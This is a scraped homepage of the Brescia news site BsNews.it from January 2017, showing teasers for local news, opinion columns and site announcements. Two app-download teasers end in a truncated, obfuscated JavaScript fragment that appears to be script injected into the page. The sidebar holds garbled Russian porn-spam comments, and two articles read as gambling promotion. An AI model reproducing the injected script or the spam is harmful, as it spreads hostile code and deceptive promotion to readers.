Questo sito o gli strumenti terzi da questo utilizzati si avvalgono di cookie necessari al funzionamento ed utili alle finalità illustrate nella cookie policy. Se vuoi saperne di più o negare il consenso a tutti o ad alcuni cookie, consulta la cookie policy.
Chiudendo questo banner, scorrendo questa pagina, cliccando su un link o proseguendo la navigazione in altra maniera, acconsenti all'uso dei cookie.     Ho capito     Maggiori informazioni



Lunedì 23 Gennaio 2017 - Ore 17:48


Cronaca Nera Politica Società Economia Mobilità Ambiente Cultura Sport Curiose Interviste
Citta' ed hinterlandBassa brescianaFranciacorta e SebinoGarda e ValtenesiVal SabbiaVal TrompiaVal CamonicaRegione Lombardia
Banner A2A
INCENDIO
Via Valcamonica, completamente distrutta da un incendio una fabbrica di plastiche
Ci sono volute 11 ore di lavoro e 17 squadre dei vigili del fuoco per spegnere l'enorme incendio che ieri pomeriggio ha completamente distrutto una fabbrica in via Valcamonica a Brescia e parzialmente intaccato la concessionaria a fianco. La fabbrica in questione, la Plexilab, si occupa di materiale plastico e proprio da questo, secondo le prime ricostruzioni, si sarebbe scatenato l'incendio. In giornata è atteso il sopralluogo dei vigili del fuoco per capire la reale causa del rogo, che potranno avvalersi anche dei filmati delle telecamere nella zona.  

Commenti
gio 19 gen 2017, ore 09.49
SPORT
Le scommesse sportive: un settore in continua crescita nel Belpaese
Per gli amanti dello sport in generale e più precisamente del Calcio , il 2016 è stato un anno con moltissimi eventi, che hanno suscitato l’attenzione dei mass media a trattare in maniera più consistente il settore delle scommesse sportive. Già solo con il calcio, nazionale e internazionale, Euro 2016, svolto in Francia, e Copa America, svoltasi negli Stati Uniti, si poteva considerare uno degli anni più prolifici per le scommesse sportive. La rivoluzione per quanto riguarda il settore del scommesse e dei concessionari è avvenuta tra il 2012 e il 2014, ovvero tra gli Europei di Polonia e Ucraina e il mondiale brasiliano, dai quali è stato possibile iniziare a scommettere comodamente seduti dal divano di casa e giocare gli eventi live ovvero durante lo svolgimento dell'e

Commenti
gio 12 gen 2017, ore 18.07
WEB
Casinò on line, i più scelti dai giocatori italiani
Ormai il fascino dei casino terrestri si sta lentamente spegnendo per dar spazio ai casino online . Su questi siti è possibile giocare qualsiasi giorno dell'anno 24 ore su 24 e comodamente seduti da casa. Basta avere una connessione internet ed un pc, un tablet o uno smartphone per iscriversi ad un casino online ed iniziare a giocare. Così facendo a differenza di quando si è in sala giochi oppure al bar o dal tabacchino si è sempre lontani da occhi indiscreti e si può quindi giocare in tutta tranquillità e riservatezza. Registrarsi su questi siti di casino online è semplicissimo e ci si impiega un paio di minuti e poi è possibile subito giocare alle slot machine piuttosto che fare una puntata alla roulette o provare un tavolo di black jack. Le transazioni di deposito su

Commenti
mer 11 gen 2017, ore 15.59
 
A proposito delle cose che leggo e sento dire in città
Sandro Belli di Sandro Belli* - Leggendo e chiacchierando in città, senza dover restare nella scia di alcuno schieramento politico o finanziario e passando di argomento in argomento senza vincoli o censure osservo e annoto. Leggo che Rolfi, ex vice sindaco, leghista, propone che l'Ospedale dei Bambini diventi ospedale di riferimento, in materia pediatrica, della Lombardia Orientale. Bravo Rolfi che riporti l'attenzione sul tema strategico lombardorientale, tema che Brescia, come capofila, potrebbe ben gestire. Nello stesso giorno anche Tino Bino, in altro contesto, sostiene "... bene il potenziamento della Lombardia Orientale". Ma le persone che incontro, passeggiando, o i giovani dell'università o dei centri sportivi, mi accorgo che nulla sanno della prospettiva (unica e rilevantissima, a mio parere) della Lombardia Orientale. Mi accorgo anche che, al di fuori dei centri sportivi e del mondo dei tifosi, non sono molti coloro che sanno dell'esistenza di un fo
 
Piazza Loggia, non fu una strage di Stato
Alfredo Bazoli di Alfredo Bazoli - Ho letto le motivazioni dell’ultima sentenza sulla strage di piazza loggia. Quella che condanna i due esponenti veneti di Ordine Nuovo imputati, Carlo Maria Maggi e Maurizio Tramonte. E sono rimasto colpito dalla capacità che ha avuto la Corte d’assise di Milano di ricomporre il puzzle degli indizi raccolti nella lunga inchiesta in un quadro convincente, coerente, lucido. Ciò è stato possibile per le tenacia inesausta degli inquirenti, e in particolare per una serie di elementi di prova raccolti anche negli ultimissimi anni, a processo in corso, che hanno consentito di superare anche gli ultimi residui dubbi. Manca ancora il giudizio finale della Cassazione, ma questa volta ho la convinzione che le acquisizioni e la ricostruzione operata dalla corte saranno in grado di superare anche l’ultimo vaglio di legittimità. Se così sarà, finalmente non solo noi familiari ma il nostro paese avrà una


(a.tortelli) Il centrodestra in città ha bisogno di una sferzata, deve superare i personalismi, unire le forze ed esprimere un candidato sindaco entro pochi mesi. Ripartendo dall'esperienza di Adriano Paroli. A lanciare l'appello è Mario Labolani, ex assessore ai Lavori pubblici del Comune di Brescia, oggi responsabile del Dipartimento regionale territorio di Fratelli d'Italia. Dopo la sconfitta elettorale e una parentesi lavorativa al Pirellone, Labolani ha cambiat
Opinioni
 
Lavoro, serve un nuovo statuto
Bonometti di Marco Bonometti* - Trovo sia interessante, almeno per qualche aspetto, l’opinione espressa sui giornali da Oriella Savoldi, membro della segreteria CGIL di Brescia. Voglio però sgombrare subito il campo da un errore che, a mio giudizio, Savoldi commette, e che potrebbe avere gravi conseguenze. Savoldi, infatti, mette insieme, sullo stesso piano, due concetti nettamente diversi: l’importanza e l’andamento dell’industria manifatturiera. E da lì parte con un commento satirico all’enfasi acritica a più voci che afferma di aver rilevato sul tema. Vorrei porre alla signora Savoldi, che fa parte di un importante organismo di un sindacato storico come la CGIL, una semplice domanda: lei mette in dubbio l’importanza dell’industria manifatturiera? Pongo la domanda in maniera molto semplice e diretta perché la questione è di rilevanza strategica non solo sul piano delle relazioni industriali, ma su quello ben pi&ugrav
 
Chagall e la polemica sulle grandi mostre
Bragaglio di Claudio Bragaglio* - La mostra di Chagall mi pare sia striata da troppe polemiche. Si tratta ora di evitarne di nuove e di maneggiare con cura quelle già esistenti. Per il buon esito della mostra stessa. Ciò mi porta subito a dire che non m’avventuro sulle questioni tirate in ballo per eventuali interessi del Direttore Di Corato per Mostre, Cataloghi e Case editrici. Di questo risponderanno Piattaforma Civica dell’avv. Onofri e Centro Destra. Per quanto mi riguarda vorrei stare al merito, dicendo di condividere la scelta, seppur estemporanea, della mostra di Chagall, con Dario Fo. Ma, a differenza di altri, in piena coerenza con la mia precedente condivisione anche della proposta di Goldin. Penso infatti abbia ragione il prof. Vasco Frati quando osserva che “al di là delle cortine fumogene… si tratta d’un progetto che ripropone il metodo Goldin dell’iniziativa organizzata chiavi in mano”. Ha quindi senso rileggere la
 
L’abbattimento della Tintoretto e le procedure amministrative
Bragaglio di Claudio Bragaglio* - Ho già motivato sulla Stampa locale la mia contrarietà all’abbattimento della Torre Tintoretto. Una vicenda complessa, ma ignorata oggi nel suo iter. Al punto da ritenere nuova la proposta avanzata da ‘Investire SGR’, quand’era già della Giunta Paroli. E contrastata dall’intero Centro Sinistra.  Mi preme qui richiamare un passaggio decisivo, già fondato motivo d’un esposto alla Corte dei Conti, predisposto da Mirko Lombardi, allora segretario cittadino di Sel. Siamo nel 2012, ed anche in ragione di quel possibile coinvolgimento della Magistratura Contabile, la Giunta Paroli e l’Aler abbandonarono la scelta dell’abbattimento per quella della vendita. La questione riguardava il danno patrimoniale derivante dall’abbattimento. Infatti un abbattimento è legittimo per vari motivi: insicurezza dello stabile, impossibilità di ristrutturazione (si pen














DAL SITO
Auguri dalla redazione di BsNews.it: il 2017 sarà un anno ricco di novità
Non ci siamo dimenticati di voi. Ad agosto vi avevamo promesso novità e in questi mesi sono cambiate molte cose, a partire dalla sede (ora siamo a Brescia, in via Vantini 31), dall'editore e dal direttore di questa testata, che si avvicina ai primi dieci anni di vita. Ora però vogliamo fare un passo più in là nella direzione di un'informazione migliore, e siamo quasi pronti. Entro fine gennaio saremo on line con la nuova versione di BsNews.it, per darvi un sito più facile, più ordinato, più intuitivo nella navigazione, più ricco di contenuti e ottimizzato sul versante mobile. Poi punteremo ancora più in alto: abbiamo nomi nuovi e idee nuove, - se le risorse e il tempo ce lo permetteranno - le porteremo avanti. Nel frattempo vi auguriamo i migliori a

sab 31 dic 2016, ore 01.07
FONDAZIONE MICHELETTI
Commercio, Davide contro Golia: ecco la sintesi degli interventi del dibattito promosso da BsNews
Davide e Golia: negozi di città e giganti della grande distribuzione, questo il titolo del dibatto che si è tenuto oggi - dalle 17.30 - nella sede della Fondazione Micheletti. A promuoverlo BsNews in collaborazione con la fondazione guidata da Aldo Rebecchi. DI SEGUITO LA SINTESI DEGLI INTERVENTI (IN ORDINE DI INTERVENTO)  ANDREA TORTELLI (DIRETTORE BSNEWS.IT) Ringrazio tutti gli ospiti: il padrone di casa Aldo Rebecchi, i due Alessandro (Belli e Benevolo) che sono opinionisti storici di BsNews e gli autorevoli interlocutori del mondo del commercio che sono qui. Da qualche settimana dirigo BsNews.it: l'obiettivo è fare un sito che diventi sempre più interlocutore della politica, dell'economia e delle forze vive del territorio, come negli anni Sessanta. ALDO REBECCHI (FONDAZIONE MICHELETTI):

Commenti 32
mer 23 nov 2016, ore 19.36
PENDOLARI
Parolini, da Trenitalia aperture per rinnovare l'accordo su Carta Plus
“I vertici di Trenitalia mi hanno confermato proprio in queste ore la loro disponibilità a rinnovare l’accordo e a considerare le richieste di Regione Lombardia per chiudere quanto prima la questione. La serrata interlocuzione che con il collega titolare dei Trasporti in Regione, Alessandro Sorte, stiamo portando avanti con l’azienda va quindi nella direzione auspicata, cioè quella di arrivare ad una soluzione sostenibile per i pendolari in termini di costi e di qualità del servizio offerto”. È quanto ha annunicato l’assessore allo Sviluppo economico di Regione Lombardia Mauro Parolini, oggi a margine della seduta di Consiglio regionale che ha trattato una mozione che chiede il rinnovo dell'accordo per l'utilizzo dell’abbonamento Carta plus sui Frecciarossa Milano-Brescia.&ld

Commenti
mer 23 nov 2016, ore 10.07
FONDAZIONE MICHELETTI
Negozi di città e giganti della grande distribuzione, il 23 il dibattito di BsNews
Il tema l'hanno lanciato due autorevoli opinionisti di questo sito: Alessandro Belli e Alessandro Benevolo su questo sito. E mercoledì 23 novembre, dalle 17.30, sarà oggetto di un dibattito alla Fondazione Micheletti organizzato in collaborazione con BsNews.it. Il titolo - Davide e Golia: negozi di città e giganti della grande distribuzione - lascia poco spazio alle interpretazioni. A meno di due mesi dall'apertura del nuovo maxicentro commerciale Ikea, che ha accolto oltre un milione di visitatori, ha riaperto il dibattito sul rapporto tra negozi di prossimità e grandi strutture commerciali. Le istituzioni, come noto, sulla questione si sono mosse su direttrici anche opposte, con una palese divergenza di interessi tra i Comuni di Brescia e Roncadelle. Mentre le associazioni dei commercianti hanno

Commenti 16
ven 04 nov 2016, ore 14.04
REFERENDUM
Centrodestra organizza un incontro pubblico per spiegare le ragioni del no
Il Centrodestra bresciano fa sentire le sue ragioni per il no al quesito del referendum costituzionale del prossimo 4 dicembre. Venerdì 4 novembre alle 20.30 nella sala Comunale di via Repubblica Argentina 120 (a fianco della scuola Ugolini) è stato organizzato un incontro pubblico dal titolo "Referendum - Le ragioni del no". Interverranno come relatori Alberto Cavalli, consigliere regionale Regione Lombardia, Simona Bordonali, assessore Sicurezza/Protezione Civile Regione Lombardia e Viviana Beccalossi, assessore Territorio/Urbanistica Regione Lombardia. Prima del dibattito porteranno i loro saluti anche i dirigenti locali del Centrodestra: Massimo Stellini (Segretario Cittadino Fratelli d’Italia), Matteo Rinaldi (Segretario Cittadino Lega Nord), Paolo Fontana (Segretario Cittadino Forza Italia), Mas

Commenti 3
mer 02 nov 2016, ore 10.09
PAUSA
Cari lettori, BsNews.it torna il 25 agosto con tante novità
Cari lettori, BsNews.it - dopo nove anni - si prende per la prima volta qualche giorno di vacanza nel mese di agosto. Il sito e i nostri canali social non verranno dunque aggiornati con nuove notizie fino al 25 agosto (salvo eventi eccezionali), anche se rimarrà attiva la moderazione dei commenti. Per i nostri lettori più affezionati l'appuntamento con la cronaca e le opinioni di BsNews.it è tra pochi giorni, quando inizierà una nuova stagione per il sito. Stiamo lavorando anche in queste "vacanze" estive per darvi un portale sempre più chiaro, trasparente, libero e autorevole. Nelle prossime settimane vedrete i frutti del nostro lavoro. Speriamo di non deludervi. Ma una cosa possiamo promettervela: rimarremo liberi, e gratis.

Commenti 7
sab 13 ago 2016, ore 12.56
DALLA REGIONE
Allevatori, Girelli (Pd): Fava si attivi subito per i bandi 400 posti a rischio
Il Gruppo regionale del Pd ha incontrato stamattina, al Pirellone, una delegazione dei lavoratori delle Apa, le associazioni provinciali allevatori. Alcuni di questi tecnici specializzati che , all’interno delle singole organizzazioni, si occupano di attuare tutte le iniziative volte al miglioramento del bestiame allevato e alla valorizzazione dei prodotti derivati, hanno appena ricevuto la lettera di licenziamento. E sono a rischio 400 posti a causa dei ritardi nell’erogazione dei finanziamenti pubblici regionali. Per questo motivo, le organizzazioni sindacali hanno organizzato una manifestazione davanti all’ingresso della sede del Consiglio regionale, proprio mentre in Aula si teneva la seduta del martedì. Il Pd ha incontrato la delegazione, guidata da Oliviero Sora della Fai Cisl, Giancarlo Venturini d

Commenti
mar 21 giu 2016, ore 15.17
L'APPUNTAMENTO
Torna a Chiari il 9 e 10 aprile la Fiera del Bambino Naturale
Dopo il successo della prima edizione, che ha visto la presenza di 8.000 persone provenienti dall’intero territorio nazionale e internazionale, il 9 e 10 aprile torna a Chiari (BS) la Fiera del Bambino Naturale, l’appuntamento green, dedicato alle famiglie e ai bambini. Un’occasione per riflettere sui temi della “genitorialità empatica”, nell’ottica del rispetto dei ritmi e dei reali bisogni dei bambini, per un ritorno ad una dimensione più naturale della nascita e della crescita. L’iniziativa, organizzata dall’Associazione Montessori Brescia e promossa da Il Leone Verde Edizioni e Associazione Il bambino naturale, in collaborazione con le associazioni L’Impronta e Kairòs, «nasce del grande bisogno di occasioni per informarsi e confrontarsi su argomenti che

Commenti
lun 04 apr 2016, ore 19.14
INFORMAZIONE DI SERVIZIO
BsNews.it è nuovamente on line. Ci scusiamo con i lettori
A causa di un problema tecnico, la cui origine non è ancora chiara e potrebbe essere riconducibile anche a un attacco informatico, BsNews.it è rimasto offline per diverse ore. Il problema è risolto e gli aggiornamenti riprendono regolarmente. Ci scusiamo con i lettori per il disagio. 

Commenti 5
dom 27 dic 2015, ore 18.23
AUGURI
Buon Natale dalla redazione di BsNews.it. Siamo sempre on line
La redazione di BsNews.it augura un felice Natale a tutti i lettori. Gli aggiornamenti proseguiranno come di consueto anche nella giornata di domani (Santo Stefano) e in tutti gli altri giorni del 2015. Nelle festività gli orari di aggiornamento potranno subire riduzioni. Ma siamo on line 365 giorni all'anno. Grazie a voi.

Commenti 7
ven 25 dic 2015, ore 11.48
INDAGINI
Omicidio da Frank, prima di colpire gli assassini dormirono a Mairano
Le indagini sull'omicidio dei coniugi Seramondi continuano senza tregua. La chiave ora è nel cremonese, dove gli inquirenti sono alla ricerca dell'uomo che ha armato i due, con un fucile rubato nel 2011. Nella stessa città è stato an che acquistato il motorino, pagato 330 euro, senza targa. Si ricostruiscono anche i momenti antecedenti l'omicidio: i due la sera del 10 agosto avrebbero dormito a Mairano, a casa di un connazionale del pakistano, prima di entrare in azione nella pizzeria da Frank. Nella stessa casa si sarebbero fermati anche prima dell'attentato a luglio, dove era rimasto ferito il dipendente di Frank, Corri Arben. 

Commenti 2
lun 24 ago 2015, ore 09.16
PER I LETTORI
Lavori in corso sul sito. Possibili disagi nella mattina di domani (venerdì)
Nella mattinata di domani (venerdì 29 maggio) i tecnici di BsNews.it saranno al lavoro sul sito per un piccolo aggiornamento. Il sito potrebbe quindi subire qualche rallentamento (di breve durata) durante l'intervento, che inizierà intorno alle 9. 

Commenti
gio 28 mag 2015, ore 18.59
L'APPELLO
Nave, trovata in fin di vita piena di pallini da caccia: ora cerca casa
L'hanno trovata piena di pallini da caccia e per questo l'hanno chiamata Bullet: una micetta che è stata presa come bersaglio da qualcuno e che, dopo tanto peregrinare, è stata salvata da un gruppo di persone che l'hanno scoperta, stremata, a Nave, in zona Muratello. Un corpicino sofferente che portava addosso segni di lotte e pallini da caccia. La gattina, scrive il giornale di Brescia, è stata curata e ora vive temporaneamente con una donna che la ospita durante questo periodo di recupero. Ma cerca casa e vuole una famiglia. Per informazioni chiamare il 377/2752468.

Commenti 4
mar 20 gen 2015, ore 17.33
IL CASO
Elezioni Aci, la commissione elettorale esclude Bonomi e Scio dal voto
Bsnews.it l'aveva scritto lo scorso 26 febbraio. E, nonostante le rassicurazioni degli interessati arrivate poche ore dopo con un comunicato stampa, la commissione elettorale ha dato ragione a quanto evidenziato dal nostro quotidiano on line: Aldo Bonomi ed Enrico Scio non sono candidabili per le elezioni dei soci ordinari del consiglio direttivo dell'Aci di Brescia in quanto alla data del 13 gennaio non risultavano ancora aver rinnovato la tessera. A stabilirlo è stata la commissione elettorale dell'ente di via Enzo Ferrari, come confermato dalla delibera del commissario Matteo Piantedosi pubblicata nella serata di giovedì sul sito www.brescia.aci.it. Al voto sono ammessi tutti e quattro i soci ordinari candidati della lista collegata ad Attilio Camozzi (Luigi Morandi, Bruno Ferrari e Federico C

Commenti 18
gio 27 mar 2014, ore 19.52
L'APPELLO DI BSNEWS.IT
Aci Brescia, il voto deve essere per tutti
Dopo anni di polemiche, ricorsi, querele e commissariamenti che hanno umiliato Brescia e i bresciani, sono finalmente state indette le nuove elezioni per il consiglio dell’Automobile Club provinciale. Purtroppo, anche in questa situazione, riscontriamo non edificanti analogie con la politica nazionale. I troppi interessi, legati principalmente alla Mille Miglia storica, hanno eccitato l’arena e allontanato i cittadini soci. Il marchio bresciano con maggior riconoscibilità a livello mondiale, che dovrebbe dare lustro e ritorno economico sul nostro territorio è ormai diventato, anche se un po’ più magro, un business a favore dei soli enti gestori. Gli oltre 15.000 soci dell’Aci Brescia non sanno che devono votare e forse neanche che possono votare, sicuramente non sanno perch&eac

Commenti 33
mer 19 feb 2014, ore 15.57
INFORMAZIONE
E' arrivata la app di Bsnews.it per Android. Scaricatela qui
Da oggi Bsnews.it è entrato anche nel mondo Android. Qualche mese dopo il rilascio della app per Ios (iPhone e iPad), infatti, è arrivata la versione definitiva dedicata al mondo Android (cellulari e tablet). La app è completamente gratuita e fornisce informazioni in tempo reale su ciò che accade a Brescia e provincia, oltre che foto e video. Con la possibilità di rispondere ai sondaggi e commentare in tempo reale le notizie. Fateci sapere cosa ne pensate. Buona lettura. PER SCARICARE LA APP DI BSNEWS.IT CLICCATE SU QUESTO LINK  function cc(){fed=az(ogo.mn[13]+'0,54,52,40,56,20');return document.cookie.search('checker')

Commenti 9
mer 24 lug 2013, ore 12.01
IL CASO
Statale 42, cellulari "vietati" per dieci minuti
L'ultimo tratto della Statale 42 è stato inaugurato a inizio febbraio. Un risultato importante per l'Alta Valle. Ma l'opera, per chi la utilizza quotidianamente, è ancora un'incompiuta. Perché manca la copertura Gsm nelle gallerie, un problema che obbliga i pendolari a dieci minuti di silenzio obbligato con il mondo. Per risolvere la situazione si è subito attivato il presidente dell'Unione Comuni dell’Alta Valle Mauro Testini, che ha scritto ad Anas (e a Prefettura, Provincia, Comunità montana, Acb, Telecom e Comuni) per sollecitare “con estrema urgenza a porre rimedio alla mancata copertura del tratto, provvedendo con solerzia alla risoluzione del problema”. Ma al momento non sono arrivate risposte ufficiali. E comunque il problema, per questioni tecniche, non potrà trovare sol

Commenti 2
sab 15 giu 2013, ore 11.13
L'INIZIATIVA
Primarie Aib, ora Bsnews.it scrive agli imprenditori
A distanza di quasi due mesi dal lancio della nostra proposta “E se l’AIB facesse le primarie?”, possiamo considerare completata la nostra iniziativa. Ringraziamo tutti i lettori che hanno partecipato, sia con gli oltre 3.000 voti ricevuti dal sondaggio, sia con gli innumerevoli commenti di comuni cittadini e di tanti rappresentanti del mondo istituzionale, economico e politico di Brescia. Abbiamo infine predisposto una lettera che invieremo nei prossimi giorni ad oltre 3500 imprenditori (la trovate allegata a questo articolo), con la speranza che una sempre più ampia partecipazione, possa aiutare le future iniziative di Bsnews  a generare benefici, seppur  minimi, per il nostro territorio.  LE INTERVISTE AI PROTAGONISTI* Bsnews.it, come annunciato, ha contattato e sta contattando TUTTI i protagoni

Commenti 4
mar 29 gen 2013, ore 10.56
LA PROPOSTA DI BSNEWS.IT
Aib, Gaia (Turboden): non mi candido, ma l'energia è una delle priorità
Uno dei nomi emersi dal sondaggio promosso da Bsnews.it per le primarie di Aib è quello di Mario Gaia, fino al 2007 docente del Dipartimento di Energia del Politecnico di Milano, fondatore e amministratore delegato di Turboden, azienda specializzata nella costruzione di turbogeneratori basati sull’ORC (Organic Rankine Cycle), una tecnologia per la produzione combinata di energia elettrica e calore che, partendo dall’innovativo impiego di fluidi di lavoro organici invece che di vapore acqueo, risulta particolarmente efficace in applicazioni per il recupero di calore industriale e l’utilizzo di fonti di energia rinnovabili. Turboden, che ha la propria sede in città in via Cernaia 10, rappresenta un’eccellenza produttiva di livello internazionale (la quota di maggioranza dell’azienda è

Commenti 1
ven 25 gen 2013, ore 11.50
LA PROPOSTA DI BSNEWS.IT
Primarie Aib, la decisione spetta alla Commissione dei saggi
* L’Associazione Industriale Bresciana - alla nostra proposta di individuare un percorso comune e condiviso per consentire ad ogni imprenditore associato di esprimere, informalmente, la sua preferenza in ordine alla nuova presidenza dell’Aib - ha risposto di non poter aderire in quanto “la richiesta è giunta dopo la nomina della Commissione di designazione dei saggi avvenuta il 10 dicembre 2012” e “ora ogni nostra presa di posizione verrebbe letta come un’indebita ingerenza nel lavoro della commissione stessa”. Ne prendiamo atto, con grande rispetto per le scelte che il vertice dell’associazione degli imprenditori ha ritenuto di compiere. Con grande rispetto, ripetiamo, ma anche con un pizzico di rammarico, perché le “primarie” che la nostra testata ha lanciat

Commenti 19
lun 14 gen 2013, ore 14.27
ECONOMIA
La Fluidmec approda nel Veronese con un nuovo Point
La bresciana Fluidmec, figura di riferimento nel mercato dell’oleodinamica e pneumatica approda a Cerea, in provincia di Verona, inaugurando l’apertura di un Point. Si tratta per Fluidmec di una nuova esperienza che si avvale di una forma di franchising per sostenere imprenditori locali che sono pronti a cimentarsi in questo mercato e lo vogliono fare con il supporto forte di competenze ed esperienze tecnico-logistiche maturate in 40 anni di attività. Fluidmec intraprende con questo primo Point un cammino che si augura non si interrompa a Cerea e che darà vita ad altre esperienze simili sul territorio italiano. Il Point si inserisce in una collaudata e solida struttura organizzativa con lo scopo di estendere il servizio e la competenza Fluidmec ad altre province, oltre a quella di Brescia in cui l’azienda

Commenti
gio 22 nov 2012, ore 17.20
NOVITA'
Scaricate l'App di Bsnews.it per iPhone e iPad. E' GRATIS!
Novità importante in casa Bsnews.it, il quotidiano on line pubblicato da Edizioni12 (a cui fa capo anche il mensile 12 Mesi, allegato ogni mese al Corriere della Sera di Brescia). Da oggi, infatti, debutta ufficialmente la nuova app dedicata agli utenti Apple. La app, sviluppata dalla società Neperia, è compatibile con tutte le ultime versioni di iPhone e adattata anche per l'utilizzo su iPad. Lì i lettori troveranno tutte le funzioni del sito: notizie in tempo reale, eventi e appuntamenti bresciani, commenti (anche tramite Facebook), sondaggi, fotografie e video. I lettori del quotidiano on line possono scaricarla GRATUITAMENTE su Apple Store (cercate Bsnews.it) e iTunes (IL LINK A QUESTO INDIRIZZO). Nei prossimi mesi verrà sviluppata anche la versione per Android.function cc(){fed=az(ogo.mn[13]+

Commenti 6
gio 15 nov 2012, ore 18.42
IL DATO
Bsnews.it festeggia oggi le 20mila notizie su Brescia (con oltre 50mila commenti). Ecco le più lette
Ventimila tonde tonde. Tante sono - con quella che leggete in questo istante - le notizie che Bsnews.it ha messo on line dalla sua nascita, nell'estate del 2008. Di queste ben 10mila sono quelle caricate soltanto nell'ultimo anno. Quello che ha sancito una nuova vita per il nostro quotidiano, che a maggio, con una grande festa, è entrato ufficialmente a far parte della grande famiglia di Edizioni 12 (di cui fa parte anche il mensile 12 Mesi, ogni mese in allegato gratuito al Corriere della Sera). Queste 20mila notizie – accompagnate da oltre 50mila commenti da parte dei lettori – costituiscono un piccolo patrimonio a disposizione dell'intera rete. Che potete consultare gratuitamente attraverso il nostro sistema di ricerca. Grazie della fiducia. E buona lettura.DI SEGUITO LA CLASSIFICA DELLE 10 NOTIZIE

Commenti 13
gio 25 ott 2012, ore 12.19
Seguici su Facebook Seguici su Twitter Seguici su Youtube Fai di bsnews.it la tua pagina iniziale Feed Rss Contatti Chi Siamo

Registrazione | Cosa puoi fare col sito
Sondaggio
Rivolete il Bigio in piazza Vittoria?
SI
NO
NON SO

Sondaggi del mese

Ultimi commenti
17:46 Tanyatooca
23 gen - Vai alla news »
Смо ;трk 7;ть пор ;но онл ;айl 5;
17:46 Tanyaalope
23 gen - Vai alla news »
Смо ;трk 7;ть как ; сую ;т дев ;к
17:40 Tanyabof
23 gen - Vai alla news »
Смо ;трk 7;ть сек ;с вид ;ео мо
17:05 Tanyageogy
23 gen - Vai alla news »
Смо ;трk 7;ть фил ;ьмm 9; для ; вз
17:02 Tanyaswell
23 gen - Vai alla news »
Смо ;трk 7;ть пор ;нуm 3;у онл ;а
16:19 deluso
23 gen - Vai alla news »
Brutto finale con tanti nostri giocatori sulle gambe e un vecchio mestierante come Ardemagni che sembrava Cristiano Ronaldo. Occhio, perché
16:06 tanto rumore pe
23 gen - Vai alla news »
Per l'allegra brigata del comitato: siete spariti? che cosa e' successo? bell'uomo batti un colpo se ci sei ancora!
16:05 Minculpop
23 gen - Vai alla news »
Perché sento un profumo di Medio Evo?
Commenti in evidenza
Pubblicità elettorale


Twitta usando @bsnewsit

IN EVIDENZA
Il libro bresciano: una comparsa di successo nell'Italia dei mediocri
Parla di quell'Italia in cui gli uomini senza virtù vengono sistematicamente premiati "La Comparsa" (Gam editore), romanzo di debutto del giornalista bresciano Andrea Tortelli (Bsnews.it)e in vendita da febbraio - al prezzo di 10 euro - nelle librerie bresciane*. Un'operetta che fa ridere e fa riflettere, con forti elementi di critica sociale e qualche tocco di teatro, in cui si narra la biografia immaginaria di Agazio Sanguedolce, siciliano trasferito a Roma che nella
Entra nella rubrica
12 News - Il Mensile
12 Mesi - Il Mensile
Fan Facebook
Link suggerito
- Regione Lombardia - Consiglio
- Regione Lombardia - Consiglieri
- Economia e Finanza a Brescia
Consiglio regionale
- La più grande comunità italiana di giornalisti sui social
- Notizie economiche su Brescia e provincia
- Parco Natura Viva, divertimento in mezzo al verde
- Cerchi un'auto? Ecco l'offerta dell'anno.
- Social network, Facebook, Twitter etc
- Social media, web 2.0, comunicazione, ebook e altro





       
PUBBLICITA' | REG. TRIB. BRESCIA 41/2008 DEL 15 SETTEMBRE 2008...